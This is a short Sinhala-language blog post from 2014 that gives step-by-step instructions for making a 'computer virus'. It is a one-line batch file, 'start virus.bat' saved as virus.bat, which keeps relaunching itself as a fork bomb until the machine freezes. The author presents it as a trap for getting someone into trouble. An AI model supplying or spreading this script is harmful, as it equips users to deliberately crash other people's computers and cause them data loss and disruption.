CLICK IT බ්ලොග් අවකාශය Hi There, and Welcome to Our Blog!

EVERY THING AT ONCE / CYBER වැඩ්ඩන්ගේ නවාතැන

Saturday, January 11, 2014

තත්පරෙන් COMPUTER VIRUS එකක් හදන හැටි.........


අද කාලේ ඕනේ තරම් computer Virus තියන එකේ මේක එච්චරම ලොකු දෙයක් නෙවෙයි.....හැබැයි මේ Virus එකත් කව්රුහරි අමාරුවේ දාන්න පුළුවන් නියම උගුලක්........වැඩි කතා නැතුව වැඩේ පටාන් ගමුකො............




පියවර 1:-
 notepad එක open කරන්න
පියවර 2:-
 මේක copy කරල notepad එකේ paste කරන්න....     start virus.bat


පියවර 3:-
 දැන් notepad එක   virus.bat   කියල save කරන්න.... ( මේ නමින්ම save කල යුතුයි)

පියවර 4:-
 දැන් double click කරල බලන්නකෝ....එකපාරටම  open කරලා බලන්න බය නම් මෙන්න මේ video එක බලල ඉන්න...........


Post එක එල කියල හිතෙනවනම් comment එකක් දාල යන්න අමතක කරන්න එපා..................
<<<<<<<<<<<<<<<GOOD LUCK>>>>>>>>>>>>>>>>>>>>>

0 comments:

Post a Comment